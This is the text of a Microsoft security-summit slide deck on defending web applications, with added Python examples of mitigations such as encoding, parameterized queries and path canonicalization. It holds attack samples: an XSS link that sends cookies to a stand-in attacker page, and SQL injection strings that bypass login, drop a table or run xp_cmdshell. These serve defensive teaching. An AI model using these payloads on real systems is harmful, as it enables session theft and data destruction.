Microsoft Australia Security Summit
Managing Risk: Application Development Principles and Best Practices
Dave Glover
Microsoft Pty Ltd
http://blogs.msdn.com/dglover
The Gartner Group states: "Today over 70% of attacks against a company's Web site or Web application come at the 'Application Layer' not the Network or System layer."
Agenda
Buffer Overruns
Arithmetic Errors
Cross-site Scripting
SQL Injection
Cryptography Weaknesses
Hidden Field Tampering
Canonicalization Issues
Web Services Security
The Others…
… And Finally
Buffer Overruns
Occur when data exceeds the expected size and overwrites other values
Exist primarily in unmanaged C/C++ code
Include four types:
Stack-based overruns
Heap overruns
V-table and function pointer overwrites
Exception handler overwrites
Can be exploited by worms and can result in:
Access violation (denial of service)
Instability
Code injection
How Stack-Based Buffer Overruns Work
#include <string.h>

void flawed(char *str)
{
    char buffer[10];
    strcpy(buffer, str);   /* no length check: 24 bytes (23 chars + NUL) are written into a 10-byte buffer */
}

int main(void)
{
    flawed("This string is too long");
    return 0;
}
Defending Against Buffer Overruns
Deprecated and should be avoided: strcpy, strncpy, CopyMemory, MultiByteToWideChar, …
Use strsafe.h (StringCchCopy and friends, which take the destination size and fail rather than overrun) for safer buffer handling
Use the /GS compile option in Visual C++ .NET
Check all array indexes
Use recognized file-path processing methods, such as _splitpath (C runtime)
Use managed code
But pay attention to P/Invoke and COM Interop: every buffer marshalled to unmanaged code reintroduces the problem
Arithmetic Errors
Occur when the limits of a variable's data type are exceeded
Lead to serious runtime issues
Are often overlooked and underestimated
Include:
Overflow – value too large for the data type
Underflow – value too small for the data type
Demo: Arithmetic Overflow
CalEngine
Purchase.aspx
GoodPurchase.aspx
Defending Against Arithmetic Errors
Understand the limitations
Unit test boundary conditions
Consider limitations of data types
Consider writing safe, reusable functions
Consider using a safe template class (if coding in C++)
Use languages that support overflow checking – VB.NET (on by default) and C# (the checked keyword or the /checked compiler option; it is off by default)
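The following is an added example, not code from the slides or the demo: it emulates the kind of quantity times unit-price total the Purchase.aspx demo computes, first with wrap-around 32-bit arithmetic and then with the range check that a checked build performs. The int32 width, the prices and the quantities are assumptions chosen for the illustration.

```python
# Added example (not from the original slides): unchecked versus checked
# 32-bit totals for a quantity * unit-price purchase calculation.
# The int32 width, prices and quantities are assumptions for the illustration.

INT32_MIN = -2**31
INT32_MAX = 2**31 - 1


def wrap_int32(value: int) -> int:
    """Emulate C#/C unchecked 32-bit arithmetic: keep only the low 32 bits."""
    return ((value + 2**31) % 2**32) - 2**31


def unchecked_total(quantity: int, unit_price_cents: int) -> int:
    """The flawed calculation: the product silently wraps around."""
    return wrap_int32(quantity * unit_price_cents)


def checked_total(quantity: int, unit_price_cents: int) -> int:
    """The defended calculation: reject anything that does not fit, like C# 'checked'."""
    if not (0 < quantity <= INT32_MAX) or not (0 <= unit_price_cents <= INT32_MAX):
        raise ValueError("quantity/price out of range")
    total = quantity * unit_price_cents
    if total > INT32_MAX:
        raise OverflowError(f"total {total} does not fit in int32")
    return total


def total_is_safe(quantity: int, unit_price_cents: int) -> bool:
    """Convenience wrapper: True if the checked calculation accepts the order."""
    try:
        checked_total(quantity, unit_price_cents)
        return True
    except (OverflowError, ValueError):
        return False


if __name__ == "__main__":
    # 50,000 units at $500.00 each: the real total is 2,500,000,000 cents.
    print("unchecked:", unchecked_total(50000, 50000))   # wraps to a negative amount
    print("checked accepts:", total_is_safe(50000, 50000))
```

A negative wrapped total is the interesting failure: the customer is credited rather than charged, and nothing crashes, so only a boundary-condition unit test or the checked build catches it.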
Cross-Site Scripting
Malicious script is sent to a Web application as input
Echoed back to a user's browser, where it is executed
Targets your users; your application is the vehicle
Attacks are via carefully crafted hyperlinks
Allows hackers to:
Execute malicious script in a client's Web browser
Insert <script>, <object>, <applet>, <form>, and <embed> tags
Steal Web session information and cookies (including authentication cookies)
Access client computer resources
How Cross-Site Scripting Works
<a href="http://…/Search.aspx?Search=<script language='javascript'>document.location.replace('http://localhost/EvilPage.aspx?Cookie=' + document.cookie);</script>">…</a>
The URL points to the site that the hacker wants to attack
The query string contains embedded JavaScript that redirects to the hacker's page and transmits any cookies issued by Search.aspx in a query string
What Is a One-Click Attack
Site offers a persistent sign-in option (cookies)
Victim user navigates to (or opens) an HTML page – perhaps a "once in a lifetime offer"
One or more actions are carried out on the site using the trust of the victim user, who is completely unsuspecting
Demo: Cross-Site Script Attacks
Search.aspx
Review.aspx
AntiXSS Library
Secure Controls
GoodSearch.aspx
Validation Controls
Secure Frames
One-Click Attack
Defending Against Cross-Site Scripting Attacks
Do not:
Trust user input
Echo client-supplied data without encoding
Store secret information in cookies
Do:
Take advantage of ASP.NET's validateRequest
Take advantage of ASP.NET's ViewStateUserKey
Consider AntiXSS for data encoding
Use the HttpOnly cookie option
Use the <frame> security attribute
Implement secure custom controls
Defending Against XSS
Input validation – first line of defense
Output encoding
Platform features:
Server.HtmlEncode() – OK: principle of exclusions (black-listing: only a fixed set of characters is encoded)
Anti-XSS – better: principle of inclusions (white-listing: known-safe characters pass, everything else is encoded)
Context: non-persistent XSS. The product search feature of WIDGETCO displays the 'searchstring' input without sanitizing or encoding.
Bad code:
someLabel.Text = "Results for " + searchstring + ":";
Mitigation using Anti-XSS:
someLabel.Text = "Results for " + AntiXSS.EncodeHtml(searchstring) + ":";
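The following is an added example, not code from the slides or the AntiXSS library: it runs the crafted Search.aspx payload shown earlier through the bad echo, through output encoding, and through allow-list input validation, so the two layers can be compared on the same input. Python's html.escape stands in for AntiXSS.EncodeHtml, and the search-term policy (letters, digits, spaces, a few punctuation characters, at most 64 characters) is an assumption for the illustration.

```python
# Added example (not from the original slides): output encoding and
# allow-list input validation for a WIDGETCO-style search echo.
# html.escape stands in for AntiXSS.EncodeHtml; the SEARCH_TERM policy
# is an assumption for the illustration.
import html
import re

# The payload from the slides' crafted hyperlink (constructed sample input).
PAYLOAD = ("<script language='javascript'>document.location.replace("
           "'http://localhost/EvilPage.aspx?Cookie=' + document.cookie);</script>")

# Allow-list: what a product search term is permitted to look like.
SEARCH_TERM = re.compile(r"^[A-Za-z0-9 .,'_-]{1,64}$")


def render_results_bad(search_string: str) -> str:
    """Echoes raw input: the payload becomes live markup in the response."""
    return "Results for " + search_string + ":"


def render_results_encoded(search_string: str) -> str:
    """Output encoding: every HTML-significant character becomes an entity."""
    return "Results for " + html.escape(search_string, quote=True) + ":"


def validate_search_term(search_string: str) -> bool:
    """Input validation, allow-list style: reject anything outside the policy."""
    return SEARCH_TERM.fullmatch(search_string) is not None


def render_results_defended(search_string: str) -> str:
    """Both layers: validate on the way in, still encode on the way out."""
    if not validate_search_term(search_string):
        raise ValueError("search term rejected by input validation")
    return render_results_encoded(search_string)


if __name__ == "__main__":
    print(render_results_bad(PAYLOAD))       # script tag survives intact
    print(render_results_encoded(PAYLOAD))   # &lt;script ...&gt; is inert text
    print(validate_search_term(PAYLOAD))     # False: never reaches the page
```

Validation alone is not enough, because a legitimate term such as O'Reilly still has to be encoded for the HTML context it lands in; encoding alone is not enough either once the same value is later written into a JavaScript string or an attribute, where a different encoder applies. That is why the slide lists both.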
Defending Against One-Click Attack
Browser's cross-frame security limits this to a "write-only" attack: the attacker can cause the request but cannot read the response
Concept for defense: require a data element in the request which the attacker can't supply
Check the Referer header (defense in depth only: proxies and privacy settings often strip it, so it must not be the sole check)
In .NET 1.1 use ViewStateUserKey, set in OnInit before view state is loaded:
protected override void OnInit(EventArgs e)
{
    // ...
    ViewStateUserKey = User.Identity.Name;
    // ...
}
SQL Injection
Adds SQL statements to user input to:
Probe databases, execute multiple SQL statements
Bypass authorization
Call built-in stored procedures
Exploits applications that don't validate input
Input from <form> fields, query strings, cookies
How SQL Injection Works
Model query:
SELECT COUNT(*) FROM Users WHERE UserName='Jeff' AND Password='imbatman'
Malicious query (the UserName field contains ' or 1=1-- and the Password field is left empty):
SELECT COUNT(*) FROM Users WHERE UserName='' or 1=1--' AND Password=''
"or 1=1" matches every record in the table
"--" comments out the remainder of the query
Examples Of SQL Injection
sqlString = String.Format("select count(*) from customers where username='{0}' and password='{1}'", userName, password);
If the userName value is read directly from a Web form or Windows form textbox, the user could enter any of the following:
ALFKI1001
ALFKI1001' or 1=1 --
ALFKI1001'; DROP TABLE OrderDetail --
ALFKI1001'; exec xp_cmdshell('fdisk.exe') --
Demo: SQL Injection Attack
Login Attack
Search Page Attack
SQL Cmd Shell Attack
Defending Against SQL Injection
Code against SQL injection attacks:
Sanitize all input
Don't use dynamic SQL commands
Use secured stored procedures or parameterized commands
Run with least privilege:
Never execute as "sa"
Restrict access to built-in stored procedures
Store connection strings securely:
Integrated Security is better
Encrypt the Web.config connectionStrings section (DPAPI or the Configuration Application Block)
Do not echo database errors (fail intelligently)
Apply administrative protections to SQL Server
http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMCh14.asp
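The following is an added example, not code from the slides: the login query from the "How SQL Injection Works" slide is run both ways against an in-memory SQLite database, once built with the String.Format-style concatenation shown above and once as a parameterized command. The table, its single user row and the plaintext password column are constructed for the illustration only (a real system stores a password hash, not the password).

```python
# Added example (not from the original slides): the slides' login query run
# as dynamic SQL and as a parameterized command against an in-memory
# SQLite database. The table and its one row are constructed for the
# illustration; a real system would store a password hash.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample database with the user from the slides."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserName TEXT, Password TEXT)")
    conn.execute("INSERT INTO Users VALUES ('Jeff', 'imbatman')")
    conn.commit()
    return conn


def count_users_dynamic(conn: sqlite3.Connection, user_name: str, password: str) -> int:
    """Vulnerable: the String.Format pattern, input pasted into the SQL text."""
    sql = ("SELECT COUNT(*) FROM Users WHERE UserName='{0}' AND Password='{1}'"
           .format(user_name, password))
    return conn.execute(sql).fetchone()[0]


def count_users_parameterized(conn: sqlite3.Connection, user_name: str, password: str) -> int:
    """Defended: the values travel as parameters and are never parsed as SQL."""
    sql = "SELECT COUNT(*) FROM Users WHERE UserName=? AND Password=?"
    return conn.execute(sql, (user_name, password)).fetchone()[0]


if __name__ == "__main__":
    db = make_db()
    attack = "' or 1=1--"
    print("dynamic, real credentials:     ", count_users_dynamic(db, "Jeff", "imbatman"))
    print("dynamic, injected username:    ", count_users_dynamic(db, attack, ""))
    print("parameterized, injected name:  ", count_users_parameterized(db, attack, ""))
```

With the injected username the dynamic query returns a match for every row and the login check passes without a password; the parameterized query looks for a user literally named ' or 1=1-- and finds none. Note that sqlite3's execute() refuses stacked statements, so the '; DROP TABLE variant from the slides raises an error here, whereas SQL Server through ADO.NET would happily run the second statement.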
Cryptography Weaknesses
Inappropriate use of algorithms:
Creating your own
Using weak ones
Incorrect application
Failure to keep keys secure:
Insecure storage
Extensive duration of use
The human factor:
Accidental release of private keys
[Figure: the four ingredients Key, Plaintext, Ciphertext, Algorithm, with the attacker's caption "I need three of the above to decrypt your data!"]
Defending Against Cryptography Weaknesses
Rotate keys periodically
Use ACLs to restrict access to keys
Store keys on an external device
Use larger keys to provide increased security
Use DPAPI to simplify key management, if possible
Do not implement your own cryptographic routines
Hidden-Field Tampering
Exploits applications that persist data between requests by round-tripping it in hidden <input> fields
The technique:
Look for <input type="hidden" … > tags
Submit bogus requests with modified value attributes to spoof the Web server
How Hidden-Field Tampering Works
Page contains this:
<input type="hidden" id="price" value="10000.00">
Postback data should contain this: price="10000.00"
Instead it contains this: price="1.00"
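The following is an added example, not code from the slides or from ASP.NET: one HMAC over the page's hidden fields plus the signed-in user's name, in the spirit of the view-state MAC combined with ViewStateUserKey. It covers both the hidden-field tampering just shown (a changed price no longer verifies) and the one-click attack defense from earlier (a form the attacker obtained or built for a different identity no longer verifies for the victim). The server secret, the __mac field name, the field values and the user names are constructed for the illustration.

```python
# Added example (not from the original slides): an HMAC over the hidden
# fields plus the current user's identity, modelled on view-state MAC +
# ViewStateUserKey. SERVER_SECRET, the "__mac" field name and the sample
# fields/users are constructed for the illustration.
import hashlib
import hmac
from urllib.parse import urlencode

SERVER_SECRET = b"constructed-secret-do-not-reuse"   # assumption: loaded from protected config


def _canonical(fields: dict, user_key: str) -> bytes:
    # Sort so the MAC is independent of field order, then bind the user identity.
    return urlencode(sorted(fields.items())).encode() + b"|" + user_key.encode()


def sign_fields(fields: dict, user_key: str) -> str:
    """MAC the server emits with the form, carried in a '__mac' hidden field."""
    return hmac.new(SERVER_SECRET, _canonical(fields, user_key), hashlib.sha256).hexdigest()


def render_form(fields: dict, user_key: str) -> dict:
    """What the server sends down: the hidden fields plus their MAC."""
    return {**fields, "__mac": sign_fields(fields, user_key)}


def verify_postback(posted: dict, current_user: str) -> bool:
    """True only if every field is unchanged and the form was issued to this user."""
    fields = {k: v for k, v in posted.items() if k != "__mac"}
    expected = sign_fields(fields, current_user)
    return hmac.compare_digest(expected, posted.get("__mac", ""))


if __name__ == "__main__":
    issued = render_form({"price": "10000.00", "item": "forklift"}, "alice")
    print("unchanged postback:   ", verify_postback(issued, "alice"))
    print("price edited to 1.00: ", verify_postback(dict(issued, price="1.00"), "alice"))
    forged = render_form({"price": "10000.00", "item": "forklift"}, "")   # attacker's page, not signed in
    print("one-click forgery:    ", verify_postback(forged, "alice"))
```

The price still round-trips through the browser, but the server no longer trusts it on name alone: the MAC is what it decides on. Binding the user name is what turns an integrity check into a one-click defense, because the attacker can copy a page rendered for their own session but cannot produce a MAC keyed to the victim's identity.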
Canonicalization Issues
There is usually more than one way to name something
Alternate representations exist for:
File names
URLs
Devices (such as printers)
Hackers may exploit code that makes decisions based on file names or URLs
Canonicalization Issues
Example 1: File Names (all four open the same file on NTFS)
1 MyLongFile.txt
2 MyLongFile.txt. (trailing dot, stripped by the Win32 file APIs)
3 MyLong~1.txt (8.3 short name)
4 MyLongFile.txt::$DATA (the file's default NTFS data stream)
Defending Against Canonicalization Issues
Use file-system security (ACLs) to restrict access to private data
Never make a security decision based on a name alone: canonicalize it first, then check the canonical form
Disable the IIS Parent Paths setting
Encrypt Web.config sections
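The following is an added example, not code from the slides or the ViewImage.aspx demo: a request-to-path check that does not decide on the name it was given. It rejects the alternate spellings from the file-name slide (trailing dot, 8.3 short name, ::$DATA stream) with an allow-list, then resolves the path and confines it to the content directory, so that a traversal such as ../Web.config fails even though no file is ever opened. The content directory and file names are constructed for the illustration.

```python
# Added example (not from the original slides): canonicalize, then decide.
# CONTENT_ROOT and the file names are constructed for the illustration.
import os
import re
from typing import Optional

CONTENT_ROOT = os.path.realpath("/srv/widgetco/images")   # assumption: the only directory served

# Allow-list for a bare file name: no separators, no ':', '~', '$' or whitespace.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}$")
# Defence in depth for the spellings on the slide: ADS, 8.3 short name, trailing dot/space.
SUSPICIOUS = re.compile(r"(::|~\d|\.$|\s$)")


def is_confined(path: str) -> bool:
    """True if the canonical form of path lies inside CONTENT_ROOT."""
    real = os.path.realpath(path)          # collapses '..' and follows symlinks
    # commonpath, not startswith: '/srv/widgetco/images2' must not pass as a prefix match.
    return os.path.commonpath([CONTENT_ROOT, real]) == CONTENT_ROOT


def resolve_request(name: str) -> Optional[str]:
    """Return the canonical path to serve, or None if the request is rejected."""
    if not SAFE_NAME.fullmatch(name) or SUSPICIOUS.search(name):
        return None
    candidate = os.path.join(CONTENT_ROOT, name)
    if not is_confined(candidate):
        return None
    return os.path.realpath(candidate)


if __name__ == "__main__":
    for requested in ("MyLongFile.txt", "MyLongFile.txt.", "MyLong~1.txt",
                      "MyLongFile.txt::$DATA", "../Web.config"):
        print(f"{requested!r:28} -> {resolve_request(requested)}")
```

The allow-list does the work for the names a browser can send; the confinement check catches whatever the allow-list misses and would also protect code paths that build the path from other sources. Both operate on the canonical form, which is the point of the slide: the name the client supplied is never what the decision is made on.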
Encrypting Web.config sections
aspnet_regiis -pc "SampleKeys" -exp            (create the RSA key container; -exp makes it exportable)
aspnet_regiis -pa "SampleKeys" "domain\acct"   (grant the application's account access to the container)
aspnet_regiis -pef connectionStrings .         (encrypt the connectionStrings section of the Web.config in the current directory)
aspnet_regiis -pdf connectionStrings .         (decrypt it again)
Web.config:
<configProtectedData defaultProvider="SampleProvider">
  <providers>
    <add name="SampleProvider"
         type="System.Configuration.RsaProtectedConfigurationProvider, System.Configuration, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL"
         keyContainerName="SampleKeys"
         useMachineContainer="true" />
  </providers>
</configProtectedData>
Demo: Traversal Attacks
PathTraversal.htm
ViewImage.aspx
GoodProducts.aspx
Web.Config Encryption
Next Steps
Stay informed about security:
Microsoft Developers Network Security Center
http://msdn.microsoft.com/security/
Microsoft Security Guidance
http://www.microsoft.com/security/guidance/
Get additional security training:
Find online and in-person training seminars:
http://www.microsoft.com/seminar/events/security/
Read the book: Writing Secure Code
Michael Howard and David LeBlanc
ISBN: 0-7356-1722-8
Defending Against the Others
Improving Web Application Security: Threats and Countermeasures
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dnnetsec/html/ThreatCounter.asp
Security seminar follow up…
Security e-forum site: www.microsoft.com.au/eforum
View on-demand web casts of all presentations from this event (tell your work colleagues!)
Online live chats: have a live chat with the Microsoft security experts you'll see today. Check the e-forum site for the Live Chat schedule.
Plus lots more…
Evaluation forms – we value your feedback! Need help with your business' security?
Q7 – register your interest on the eval form if you want to meet with Microsoft / a MS Security Solutions Partner to discuss solutions to address your security challenges
Fill in your form to go into the draw to win an HP Media Centre PC or Xbox 360